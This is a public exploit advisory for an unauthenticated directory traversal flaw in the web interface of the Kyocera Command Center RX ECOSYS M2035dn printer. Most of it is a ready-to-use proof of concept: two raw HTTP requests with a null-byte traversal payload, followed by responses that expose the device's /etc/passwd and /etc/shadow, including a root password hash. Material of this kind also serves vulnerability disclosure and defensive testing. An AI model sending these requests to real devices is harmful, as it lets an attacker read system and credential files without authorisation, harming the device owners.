Kyocera Command Center RX ECOSYS M2035dn Directory Traversal

`# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)   
# Author: Luis Martinez  
# Discovery Date: 2022-02-10  
# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html  
# Tested Version: ECOSYS M2035dn  
# Tested on: Linux  
# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)  
  
# Proof of Concept:  
# 1.- Create a directory traversal payload  
# 2.- Add nullbyte to the end of the payload(%00)  
# 3.- Sent your request  
  
Request 1:  
  
GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1  
Cookie: rtl=0  
Host: X.X.X.X  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)  
Accept: */*  
  
Response 1:  
  
HTTP/1.1 200 OK  
Content-Length: 844  
Upgrade: TLS/1.0  
Accept-Encoding: identity  
Date: Thu, 10 Feb 2022 15:55:57 GMT  
Server: KM-MFP-http/V0.0.1  
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT  
ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"  
Content-Type: image/jpeg  
  
root:x:0:0:root:/root:/bin/sh  
bin:x:1:1:bin:/bin:/bin/sh  
daemon:x:2:2:daemon:/usr/sbin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
adm:x:4:4:adm:/var/adm:/bin/sh  
lp:x:5:7:lp:/var/spool/lpd:/bin/sh  
sync:x:6:8:sync:/bin:/bin/sync  
shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown  
halt:x:8:10:halt:/sbin:/sbin/halt  
mail:x:9:11:mail:/var/mail:/bin/sh  
news:x:10:12:news:/var/spool/news:/bin/sh  
uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh  
operator:x:12:0:operator:/root:/bin/sh  
games:x:13:60:games:/usr/games:/bin/sh  
ftp:x:15:14:ftp:/var/ftp:/bin/sh  
man:x:16:20:man:/var/cache/man:/bin/sh  
www:x:17:18:www-data:/var/www:/bin/sh  
sshd:x:18:19:sshd:/var/run/sshd:/bin/sh  
proxy:x:19:21:proxy:/bin:/bin/sh  
telnetd:x:20:22:proxy:/bin:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
ais:x:101:101:ais:/var/run/ais:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
  
Request 2:  
  
GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1  
Cookie: rtl=0  
Host: X.X.X.X  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)  
Accept: */*  
  
Response 2:  
  
HTTP/1.1 200 OK  
Content-Length: 480  
Upgrade: TLS/1.0  
Accept-Encoding: identity  
Date: Thu, 10 Feb 2022 16:10:16 GMT  
Server: KM-MFP-http/V0.0.1  
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT  
ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"  
Content-Type: image/jpeg  
  
root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::  
bin:*:15873::::::  
daemon:*:15873::::::  
sys:*:15873::::::  
adm:*:15873::::::  
lp:*:15873::::::  
sync:*:15873::::::  
shutdown:*:15873::::::  
halt:*:15873::::::  
mail:*:15873::::::  
news:*:15873::::::  
uucp:*:15873::::::  
operator:*:15873::::::  
games:*:15873::::::  
ftp:*:15873::::::  
man:*:15873::::::  
www:*:15873::::::  
sshd:*:15873::::::  
proxy:*:15873::::::  
telnetd:*:15873::::::  
backup:*:15873::::::  
ais:*:15873::::::  
nobody:*:15873::::::  
  
`